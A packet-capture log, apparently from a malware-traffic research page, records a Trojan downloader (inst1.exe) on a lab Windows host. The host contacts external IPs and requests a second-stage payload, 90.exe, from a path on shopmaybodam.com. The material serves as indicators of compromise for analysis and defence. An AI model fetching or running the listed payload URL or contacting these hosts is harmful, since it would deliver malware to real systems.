Inst1.exe Trojan Downloader Loads 90.exe Unknown Malware PCAP file download

Inst1.exe Trojan Downloader Loads 90.exe Unknown Malware PCAP file download

 

2016-09-20 09:02:11.821468 IP 192.168.1.102.59656 > 192.168.1.100.80: Flags [P.], seq 1:336, ack 1, win 256, length 335: HTTP: GET /captured/inst1.exe HTTP/1.1
E..w.[………f…d…P#7….U.P…….GET /captured/inst1.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://192.168.1.100/captured/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.100
Connection: Keep-Alive
2016-09-20 09:02:11.821487 IP 192.168.1.100.80 > 192.168.1.102.59656: Flags [.], ack 336, win 237, length 0

E..(.,….LH…f]….&..z..*/..;P… ………
2016-09-20 09:03:55.606661 IP 192.168.1.102.59686 > 93.171.202.162.443: Flags [.], ack 549660, win 2268, length 0
E..(.-….LG…f]….&..z..*/..EP………….
2016-09-20 09:03:55.886564 IP 192.168.1.102.62247 > 75.75.75.75.53: 40557+ A? shopmaybodam.com. (34)
E..>6……^…fKKKK.’.5.*…m………..shopmaybodam.com…..
2016-09-20 09:03:56.183757 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [S], seq 3854319646, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….z…fg.’e.’.P..@……. ..-…………..
2016-09-20 09:03:56.463188 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [.], ack 4258741258, win 256, length 0
E..(………..fg.’e.’.P..@…<
P………….
2016-09-20 09:03:56.463600 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [P.], seq 0:356, ack 1, win 256, length 356: HTTP: GET /wp-content/themes/twentyfifteen/genericons/90.exe HTTP/1.1
E………. …fg.’e.’.P..@…<
P…….GET /wp-content/themes/twentyfifteen/genericons/90.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: shopmaybodam.com